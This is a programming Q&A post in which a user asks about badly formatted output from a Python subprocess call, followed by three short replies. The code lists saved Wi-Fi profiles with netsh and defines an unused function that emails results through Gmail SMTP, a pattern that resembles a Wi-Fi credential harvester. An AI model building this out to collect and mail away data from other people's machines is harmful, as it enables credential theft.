# output of the code is not in right format shell I am using python 3.9 and using subprocess module to run command line

Tags: python

output of the code is not in nice format I have added the code and the link of output image , first image is what output I am getting and the second link is for desired output i am using python 3.9 interpreter in windows

output i am getting its right but the format in not right:

[image: output i am getting its right but the format in not right]

,,,,
output in right formate by directly running command in command line:

[image: output in right formate by directly running command in command line]

```
#!/usr/bin/env python
import subprocess, smtplib, re


def send_mail(email, password, result):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, result)
    server.quit()


command = "netsh wlan show profile"
result = subprocess.check_output(command, shell=True)
print(result)
```

Comment: Where is the link?

Comment: try this: `result = str(subprocess.check_output(command, shell=True))`

Comment: Hi, what exactly is the question?